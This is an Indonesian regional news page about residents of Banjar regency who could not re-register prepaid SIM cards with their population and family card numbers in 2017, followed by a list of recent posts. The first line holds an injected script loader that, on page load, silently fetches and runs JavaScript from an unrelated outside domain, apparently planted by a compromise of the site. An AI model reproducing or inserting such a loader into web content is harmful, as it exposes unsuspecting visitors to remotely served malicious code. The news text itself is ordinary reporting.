(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Gara-gara Gagal Daftar Ulang Kartu Prabayar, Warga Mengadu ke Disdukcapil


MARTAPURA, Terhitung per 31 Oktober 2017, Kementerian Komunikasi dan Informatika RI memberlakukan masa wajib daftar ulang kartu seluler prabayar menggunakan Nomor Induk Kependudukan (NIK) dan Kartu Keluarga (KK).

Seluruh pelanggan pengguna kartu prabayar, baik pelanggan lama maupun baru diwajibkan mendaftar paling lambat 28 Februari 2018. Jika tidak melakukan registrasi, pemblokiran akan dilakukan bertahap.

Namun, proses daftar ulang dengan memasukkan NIK dan KK tak semuanya lancar. Baru beberapa hari diberlakukan, Dinas Kependudukan dan Pencatatan Sipil (Disdukcapil) Kabupaten bahkan sudah menerima beberapa keluhan warga yang tak berhasil melakukan daftar ulang kartu prabayar.

Menurut Azwar, Kepala Disdukcapil Kabupaten Banjar, sejak pemberlakukan wajib registrasi ulang kartu prabayar, sudah ada empat warga yang datang ke Kantor Disdukcapil Banjar dengan keluhan gagal melakukan daftar ulang kartu HP-nya.

“Memang ada beberapa warga datang untuk konsultasi karena gagal mendaftarkan ulang kartu SIM handphonenya. Tapi setelah dilakukan refresh data, daftar ulang kartu SIM handphone berhasil,” kata Azwar, Jumat (3/11).

Disampaikan Azwar, beberapa yang gagal mendaftarkan ulang kartu handphone lantaran ada beberapa perubahan data, semisal pindah alamat dari Martapura ke Banjarbaru. Ada juga yang KTP elektroniknya belum diaktifitas.

Menurutnya, ada kemungkinan dalam beberapa bulan kedepan akan semakin banyak lagi warga yang datang ke Kantor Disdukcapil Banjar karena gagal mendaftar ulang kartu SIM handphone.

“Kami siap saja melayani jika memang ada warga yang gagal melakukan daftar ulang kartu handphonenya. Karena memang bisa saja gagal mendaftar ulang karena ada kesalahan dalam input data kependudukan,” ujar Azwar. (rudiyanto)


Desy Arfianty

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

2 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

4 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

5 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

5 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

5 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

5 jam ago

This website uses cookies.